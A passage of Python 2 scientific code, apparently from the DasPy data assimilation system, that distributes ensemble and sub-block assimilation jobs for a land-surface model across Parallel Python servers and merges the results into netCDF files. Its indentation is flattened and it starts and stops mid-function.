print "Finish the Analysis of", Analysis_Variable_Name[Prop_Grid_Array_Sys_Index]
print "Dim NA_Value of Analysis", numpy.size(numpy.where(Analysis_Grid[Prop_Grid_Array_Sys_Index,::] == NAvalue))
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Initial_Copy.close()
del Prop_Grid_Array_Sys_Copy
#os.abort()
numexpr_a = Analysis_Grid[Prop_Grid_Array_Sys_Index,::]
numexpr_b = NAvalue
numexpr_c = numpy.where(numexpr_a == numexpr_b)
NA_Index_Analysis_Grid = numexpr_c
OutputDate=Stop_Year+ Stop_Month+Stop_Day
if Write_DA_File_Flag:
if not os.path.exists(DasPy_Path+"Analysis/DAS_Temp/"+Region_Name+"/Localization_Map_Mask"):
os.makedirs(DasPy_Path+"Analysis/DAS_Temp/"+Region_Name+"/Localization_Map_Mask")
Localization_Map_Mask_File_Name = DasPy_Path+"Analysis/DAS_Temp/"+Region_Name+"/Localization_Map_Mask/Localization_Map_Mask_"+SensorVariable_Sub+"_"+OutputDate+".txt"
numpy.savetxt(Localization_Map_Mask_File_Name,Localization_Map_Mask[Prop_Grid_Array_Sys_Index,::])
if Def_Write_Initial:
if Def_PP and Ensemble_Number > 1:
print "********************************************** Using PP to Accelerate Write_Initial_File"
if PDAF_Assim_Framework == 2: # Restart PP sever after PDAF MPI
job_server_node_array, active_nodes_server, PROCS_PER_NODE, PP_Port, PP_Servers_Per_Node = DAS_Driver_Common.Start_ppserver(mpi4py_comm, mpi4py_rank, mpi4py_name, DAS_Output_Path, Ensemble_Number, DAS_Depends_Path, active_nodes_server, Def_Region, NSLOTS, Def_Print, DasPy_Path, Def_PP, Def_CESM_Multi_Instance, PP_Port)
while len(job_server_node_array) < 1:
job_server_node_array = DAS_Driver_Common.Stop_ppserver(mpi4py_rank, Def_PP, DAS_Depends_Path, job_server_node_array, NSLOTS, DasPy_Path, active_nodes_server, PP_Servers_Per_Node)
job_server_node_array, active_nodes_server, PROCS_PER_NODE, PP_Port, PP_Servers_Per_Node = DAS_Driver_Common.Start_ppserver(mpi4py_comm, mpi4py_rank, mpi4py_name, DAS_Output_Path, Ensemble_Number, DAS_Depends_Path, active_nodes_server, Def_Region, NSLOTS, Def_Print, DasPy_Path, Def_PP, Def_CESM_Multi_Instance, PP_Port)
Job_Num_Per_Node = int(numpy.ceil(float(Ensemble_Number) / len(active_nodes_server)))
print "The following submits",Job_Num_Per_Node,"jobs on each node and then retrieves the results"
if Job_Num_Per_Node == 0:
Job_Num_Per_Node = 1
job_server_node_results = []
Ens_Index = 0
Job_Num_Per_Node_Index = 0
while Job_Num_Per_Node_Index < Job_Num_Per_Node and Ens_Index < Ensemble_Number:
for Node_Index in range(len(active_nodes_server)):
job_server_node = job_server_node_array[numpy.min([Job_Num_Per_Node_Index+Node_Index*len(job_server_node_array)/len(active_nodes_server),len(job_server_node_array)-1])]
#job_server_node = job_server_node_array[Node_Index]
if Ens_Index > Ensemble_Number - 1:
break
job_server_node_results.append(job_server_node.submit(Write_Initial_File, args=(Ens_Index, Model_Driver, Def_PP, DasPy_Path, Run_Dir_Array, Soil_Layer_Num, ParFlow_Layer_Num, numrad, Row_Numbers, Col_Numbers, finidat_name, SensorVariable_Sub, Variable_ID_Sub, CLM_NA, Feedback_Assim, Stop_Month, Stop_Hour, UTC_Zone, \
pft_len,maxpft, Def_Region, DAS_Data_Path, Region_Name, Crop_Sum, SensorType_Sub, Row_Numbers_String, Col_Numbers_String, \
Snow_Layer_Num, column_len, Mask_Index_Sub, Def_Print, Def_ParFor, dtime, irrig_nsteps_per_day, PFT_Num, NAvalue, Density_of_liquid_water, Freezing_temperature_of_fresh_water, Density_of_ice, \
DAS_Depends_Path, omp_get_num_procs_ParFor, Soil_Layer_Index_DA, Variable_Assimilation_Flag, Variable_List, \
NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial, NC_FileName_Assimilation_2_Initial_Copy, NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Bias_Copy, fpftcon_name, finidat_name_string),
depfuncs=(Check_Outliers,),
modules=("numpy", "netCDF4", "sys", "os", "re", "unittest", "time", "datetime", "shutil", "fnmatch", "subprocess", "string", "socket", "gc", "imp", "getpass", "calendar","scipy.stats", 'scipy.weave'), group='Write_Initial_File'))
Ens_Index = Ens_Index + 1
Job_Num_Per_Node_Index = Job_Num_Per_Node_Index + 1
for job_server_node in job_server_node_array:
job_server_node.wait()
if Def_Print >= 2:
job_server_node.print_stats()
if Def_Print:
if len(job_server_node_results) > 0:
for job in job_server_node_results:
job_index = job_server_node_results.index(job)
if job_index > (Ensemble_Number - 1):
break
print "Results of ",job_index,"is", job()
else: # ********* Run Read_History_File Sequentially
for Ens_Index in range(Ensemble_Number):
Write_Initial_File(Ens_Index, Model_Driver, Def_PP, DasPy_Path, Run_Dir_Array, Soil_Layer_Num, ParFlow_Layer_Num, numrad, Row_Numbers, Col_Numbers, finidat_name, SensorVariable_Sub, Variable_ID_Sub, CLM_NA, Feedback_Assim, Stop_Month, Stop_Hour, UTC_Zone, \
pft_len, maxpft, Def_Region, DAS_Data_Path, Region_Name, Crop_Sum, SensorType_Sub, Row_Numbers_String, Col_Numbers_String, \
Snow_Layer_Num, column_len, Mask_Index_Sub, Def_Print, Def_ParFor, dtime, irrig_nsteps_per_day, PFT_Num, NAvalue, Density_of_liquid_water, Freezing_temperature_of_fresh_water, Density_of_ice, \
DAS_Depends_Path, omp_get_num_procs_ParFor, Soil_Layer_Index_DA, Variable_Assimilation_Flag, Variable_List,
NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial, NC_FileName_Assimilation_2_Initial_Copy, NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Bias_Copy, fpftcon_name, finidat_name_string)
gc.collect()
del gc.garbage[:]
return Analysis_Grid, Initial_Perturbation_SM_Flag, Initial_Perturbation_ST_Flag, job_server_node_array, active_nodes_server
def Parameter_Update(mpi4py_comm, mpi4py_rank, mpi4py_name, gelmna_threshold, Optimized_Parameter_Index, Model_Driver, NSLOTS,Def_PP, Def_First_Run, Def_Print, Feedback_Assim, Def_Par_Optimized, Parameter_Optimization, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, SensorQuantity_Sub, SensorType_Sub, SensorVariable_Sub, SensorResolution_Sub, Variable_ID_Sub, QC_ID_Sub, Variable_List, maxpft, \
Row_Numbers, Col_Numbers, Ensemble_Number, Ensemble_Number_Predict, Dim_Obs_Type, Observation_Matrix, Observation_Longitude, Observation_Latitude, job_server_node_array, active_nodes_server, ntasks_CLM,
Mask, Mask_Index, NAvalue, COSMOS_Circle_Array, COSMOS_Circle_Index_Array, COSMOS_Circle_Num_Array, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Par_Index_Increment_Soil_Par, DasPy_Path, \
Variable_Assimilation_Flag, DAS_Depends_Path, Def_ParFor, omp_get_num_procs_ParFor, Def_CDF_Matching, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type, PP_Servers_Per_Node, Def_CESM_Multi_Instance, PP_Port, \
Plot_Analysis, Soil_Layer_Index_DA, Initial_Perturbation_SM_Flag, Initial_Perturbation_ST_Flag, Post_Inflation_Alpha_Par, \
Soil_Par_Sens_Array, Veg_Par_Sens_Array, PFT_Par_Sens_Array, Hard_Par_Sens_Array, Datetime_Start, Datetime_Initial, Low_Ratio_Par, High_Ratio_Par, Low_Ratio_Par_Uniform, High_Ratio_Par_Uniform, Write_DA_File_Flag,
r, Observation_Box, Def_Region, Dim_CLM_State, Num_Local_Obs, Model_Variance, DateString_Plot,
Def_Multiresolution, Def_ReBEL, Def_Localization, Assim_Algorithm_Name, eps, msw_infl, Region_Name, Call_Gstat_Flag, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Proj_String, MODEL_CEA_X, MODEL_CEA_Y, Z_Resolution,
dtime, Irrigation_Hours, column_len, Weather_Forecast_Days, Datetime_End, Hydraulic_File_Name, fpftcon_name, Run_Dir_Array,
Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD, Dim_Observation_Quantity,
Snow_Layer_Num, Def_Write_Initial, cols1d_ixy, cols1d_jxy, cols1d_ityplun, pfts1d_ityplun, Freezing_temperature_of_fresh_water, Density_of_ice, N0, nlyr,
Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
diskless_flag, persist_flag, Irrig_Scheduling, Run_Dir_Home, Start_Month, Stop_Year, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, finidat_name, Density_of_liquid_water, Irrigation_Grid_Flag_Array,
mksrf_edgee, mksrf_edges, mksrf_edgew, mksrf_edgen, Datetime_Stop, Datetime_Stop_Init, CLM_NA,
Observation_Variance, Observation_NLons, Observation_NLats, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper, Observation_Corelation_Par, octave, Station_XY, Station_XY_Index, Soil_Layer_Num, Analysis_Variable_Name,
Analysis_Grid, Localization_Map_Mask, ObsModel_Mat, ObsModel_Variance_Mat, Mask_Sub, Mask_Index_Sub, Mask_Index_Vector, Observation_Matrix_Index, Prop_Grid_Array_Sys_Index, Model_State,
SensorQuantity_Index, E0_ObsModel_Mask, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Soil_Par_Accum_Dim, Veg_Par_Accum_Dim, PFT_Par_Accum_Dim, Hard_Par_Accum_Dim, ParFlow_Layer_Num,
Forcing_File_Path, Observation_Path, DAS_Data_Path, Grid_Resolution_CEA, Grid_Resolution_GEO, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Initial_Copy, NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Bias_Copy, NC_FileName_Assimilation_2_Bias_Monthly, NC_FileName_Assimilation_2_Bias_Monthly_Copy,
NC_FileName_Assimilation_2_Parameter, NC_FileName_Assimilation_2_Parameter_Copy, NC_FileName_Assimilation_2_Parameter_Obs_Dim,
NC_FileName_Assimilation_2_Parameter_Monthly, NC_FileName_Assimilation_2_Parameter_Monthly_Copy, NC_FileName_Parameter_Space_Single, DAS_Output_Path, \
COSMIC_Py, window, memory_profiler, COSMIC, Observation_Time_File_Path):
NC_File_Parameter_Space_Single = netCDF4.Dataset(NC_FileName_Parameter_Space_Single,'r')
Bias_Estimation_Option_Model_Par = numpy.asarray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) # Model Bias
Bias_Estimation_Option_Obs_Par = numpy.asarray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) # Observation Bias
print "Optimized_Parameter_Index",Optimized_Parameter_Index
if Def_Print >= 4:
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r')
print NC_File_Parameter_Space_Single.variables['Parameter_Soil_Space_Single'][:,:,:], NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:,:,:,:]
NC_File_Out_Assimilation_2_Parameter.close()
# Split the Block into SubBlocks to do data assimilation
Soil_Par_Sens_Dim = numpy.size(numpy.where(Soil_Par_Sens == True))
Veg_Par_Sens_Dim = 0
PFT_Par_Sens_Dim = 0
Hard_Par_Sens_Dim = 0
if Soil_Par_Sens_Dim >= 1:
Soil_Par_Accum_Dim = Soil_Par_Accum_Dim + 1
Optimized_Parameter_Index[0] = Optimized_Parameter_Index[0] + 1
print "**********************************************************************Optimize Soil Parameter"
if Parameter_Optimization == 2:
print "############################## Parameter Estimation using Augmentation"
Parameter_Optimization_Flag = 1
if Def_PP and (not PDAF_Assim_Framework == 2) and (Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) > 1 and len(active_nodes_server) > 1:
print "********************************************** Using PP to Accelerate Block_Assim"
Job_Num_Per_Node = int(numpy.ceil(float(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) / len(active_nodes_server)))
print "The following submits",Job_Num_Per_Node,"jobs on each node and then retrieves the results"
if Job_Num_Per_Node == 0:
Job_Num_Per_Node = 1
job_server_node_results = []
job_server_node_results_wise = [[] for i in range(len(active_nodes_server))]
# The following submits 1 job to 1 node and then retrieves the results
print "+++++++++++++++++ The following submits",Job_Num_Per_Node,"jobs to 1 node and then retrieves the results"
Block_Index = 0
Node_Status = numpy.zeros(len(active_nodes_server),dtype=numpy.bool)
Node_Status[:] = True
while Block_Index < Sub_Block_Ratio_Row*Sub_Block_Ratio_Col:
if numpy.size(numpy.where(Node_Status==True)) > 0:
Node_Index = numpy.where(Node_Status==True)[0][0]
print "***********************Node_Index",Node_Index,"Block_Index",Block_Index,"is submitted!"
job_server_node = job_server_node_array[numpy.min([Node_Index*len(job_server_node_array)/len(active_nodes_server),len(job_server_node_array)-1])]
job_server_node_results.append(job_server_node.submit(Block_Assim, args=(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_Par, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Par, Bias_Estimation_Option_Obs_Par, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path),
depfuncs=(CLM_Assim_Common, Check_Outliers, ParFor_PFT, ParFor_PFT_Block_Assim, ParFor_Fusion, ParFor_H_Operator, ParFor_Texture_Check, ParFor_Check_Outliers, ParFor_Check_Outliers_NA,),
modules=("numpy", "netCDF4", "sys", "os", "re", "gc", "imp", "unittest", "time", "datetime", "shutil", "fnmatch", "subprocess", "string", "socket", "getpass", "calendar", "glob","scipy.stats",'scipy.weave'), group='Block_Assim'))
job_server_node_results_wise[Node_Index] = job_server_node_results[Block_Index]
Node_Status[Node_Index] = False
Block_Index = Block_Index + 1
if Block_Index >= len(active_nodes_server):
for job in job_server_node_results_wise:
if job != [] and job.finished:
Node_Index = job_server_node_results_wise.index(job)
print "*********************************************************************Node_Index",Node_Index,"is finished!"
Node_Status[Node_Index] = True
job_server_node_results_wise[Node_Index] = []
for job_server_node in job_server_node_array:
job_server_node.wait()
if Def_Print >= 2:
job_server_node.print_stats()
if Def_Print:
if len(job_server_node_results) > 0:
for job in job_server_node_results:
job_index = job_server_node_results.index(job)
if job_index > (Ensemble_Number - 1):
break
print "Results of ",job_index,"is", job()
else:
print "********* Run Block_Assim Sequentially"
if PDAF_Assim_Framework == 2:
DAS_Driver_Common.Stop_ppserver(mpi4py_rank, Def_PP, DAS_Depends_Path, job_server_node_array, NSLOTS, DasPy_Path, active_nodes_server, PP_Servers_Per_Node)
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
Block_Assim(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_Par, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Par, Bias_Estimation_Option_Obs_Par, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path, octave, r)
print "Write NC_File_Out_Assimilation_2_Initial.nc"
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r+')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r+')
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r+')
Parameter_Soil_Space_Ensemble = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:, :, :, :]
Parameter_Soil_Space_parm_infl = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_parm_infl'][:, :, :]
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, :, :, :]
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
print "Block_Index",Block_Index
Sub_Block_Row_Start = Sub_Block_Row_Start_Array[Block_Index]
Sub_Block_Row_End = Sub_Block_Row_End_Array[Block_Index]
Sub_Block_Col_Start = Sub_Block_Col_Start_Array[Block_Index]
Sub_Block_Col_End = Sub_Block_Col_End_Array[Block_Index]
NC_FileName_Out_Block = DAS_Output_Path+"Analysis/"+Region_Name+"/Block_Assim_"+str(Block_Index+1)+".nc"
NC_File_Out_Block = netCDF4.Dataset(NC_FileName_Out_Block, 'r')
Analysis_Grid[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid'][:,:]
Localization_Map_Mask[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Localization_Map_Mask'][:,:]
Parameter_Soil_Space_Ensemble[:, :, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Parameter_Soil_Space_Ensemble'][:,:,:,:]
Parameter_Soil_Space_parm_infl[:, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Parameter_Soil_Space_parm_infl'][:,:,:]
Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid_Array'][:,Prop_Grid_Array_Sys_Index,:,:]
NC_File_Out_Block.close()
NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:, :, :, :] = Parameter_Soil_Space_Ensemble
NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_parm_infl'][:, :, :] = Parameter_Soil_Space_parm_infl
NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, Prop_Grid_Array_Sys_Index, :, :] = Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, :, :]
del Parameter_Soil_Space_Ensemble,Parameter_Soil_Space_parm_infl,Analysis_Grid_Array
NC_File_Out_Assimilation_2_Initial.sync()
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Parameter.sync()
NC_File_Out_Assimilation_2_Parameter.close()
NC_File_Out_Assimilation_2_Diagnostic.sync()
NC_File_Out_Assimilation_2_Diagnostic.close()
#------------------------------------------Finish Assimilation
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
Observation_Matrix_Copy = numpy.copy(Observation_Matrix[Observation_Matrix_Index,::])
Observation_Matrix_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, Observation_Matrix_Copy)
Analysis_Grid_Temp = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], Analysis_Grid[Prop_Grid_Array_Sys_Index,::])
Analysis_Grid_Temp = numpy.ma.masked_where(Analysis_Grid_Temp == NAvalue, Analysis_Grid_Temp)
Model_State = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], numpy.mean(NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, :, :],axis=0))
ObsModel_Mat_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, ObsModel_Mat)
NC_File_Out_Assimilation_2_Initial_Copy.close()
if Def_Print:
print "numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)",numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)
print "Min Observation Value is:", Observation_Matrix_Copy.min(), "Maximum Observation Value is:", Observation_Matrix_Copy.max()
print "Min Model_State Value is:", Model_State.min(), "Maximum Model_State Value is:", Model_State.max()
print "Min Analysis_Grid Value is:", Analysis_Grid_Temp.min(), "Maximum Analysis_Grid Value is:", Analysis_Grid_Temp.max()
print "Analysis Mean is:", numpy.mean(Analysis_Grid_Temp), "Model Ensemble Mean is:", numpy.mean(Model_State), "(Analysis - Model_State) Mean is:", numpy.mean(Analysis_Grid_Temp.flatten() - Model_State.flatten())
print "ObsModel_Mat Mean is:", numpy.mean(ObsModel_Mat_Copy),"Observation Mean is:", numpy.mean(Observation_Matrix_Copy), "(ObsModel_Mat - Observation) Mean is:", numpy.mean(ObsModel_Mat.flatten() - Observation_Matrix_Copy.flatten())
if Def_Print:
print "******************************************************** Station Statistics"
for Station_Index in range(numpy.size(Station_XY)/2):
print "Station_"+str(Station_Index+1),"Analysis:",Analysis_Grid_Temp[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Model Value:",Model_State[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Observation_Value:",Observation_Matrix_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
print "ObsModel_Variance:",ObsModel_Variance_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"ObsModel:",ObsModel_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del Observation_Matrix_Copy,Analysis_Grid_Temp,Model_State,ObsModel_Mat_Copy
else:
print "############################## Wrong Parameter_Optimization Value, Should be 1 or 2"
os.abort()
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r+')
NC_File_Out_Assimilation_2_Parameter_Obs_Dim = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Obs_Dim, 'r+')
NC_File_Out_Assimilation_2_Parameter_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Copy, 'r')
if Def_Print:
Parameter_Soil_Space_Ensemble = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:, :, :,:]
Parameter_Soil_Space_Ensemble_Copy = NC_File_Out_Assimilation_2_Parameter_Copy.variables['Parameter_Soil_Space_Ensemble'][:, :, :,:]
print "******************************************************** Station Statistics"
for Station_Index in range(numpy.size(Station_XY)/2):
print "-------------------------------------------Results of Station_"+str(Station_Index+1)
Par_Index_Sub = 0
for Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens[Par_Index]:
print "Soil_Par_Sens[Par_Index]",Par_Index
print "Parameter_Soil_Space_Ensemble_Copy:",numpy.mean(Parameter_Soil_Space_Ensemble_Copy[:, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0), \
"Parameter_Soil_Space_Ensemble:",numpy.mean(Parameter_Soil_Space_Ensemble[:, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0)
if msw_infl < 0.0:
print "Parameter_Soil_Space_parm_infl_Copy:",numpy.mean(NC_File_Out_Assimilation_2_Parameter_Copy.variables['Parameter_Soil_Space_parm_infl'][Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0), \
